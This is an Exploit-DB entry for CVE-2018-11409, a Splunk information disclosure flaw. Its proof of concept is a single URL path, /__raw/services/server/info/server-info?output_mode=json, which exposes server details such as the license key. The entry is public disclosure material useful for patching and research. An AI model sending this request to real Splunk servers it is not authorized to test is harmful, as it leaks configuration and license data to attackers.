Splunk < 7.0.1 - Information Disclosure

EDB-ID: 44865
Author: KoF2002
Published: 2018-06-08
CVE: CVE-2018-11409
Type: Webapps
Platform: Linux
Vulnerable App: N/A

 # Date: 2018-05-23 
 # Exploit Author: KoF2002 
 # Vendor Homepage: https://www.splunk.com/ 
 # Version: 6.2.3 - 7.01 MAYBE ALL VERSION AFFECTED 
 # Tested on: Linux OS 
 # CVE : CVE-2018-11409 
  
 # Splunk through 6.2.3 7.0.1 allows information disclosure by appending 
 # /__raw/services/server/info/server-info?output_mode=json to a query, 
 # as demonstrated by discovering a license key and other information. 
  
 # PoC : 
  
 https://127.0.0.1:8000/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json 
  
 # Greats : Cold z3ro , ihab pal and all HTLovers "We Are Back"

Source: www.exploit-db.com

Exploit Collector

Search Exploit

Splunk < 7.0.1 - Information Disclosure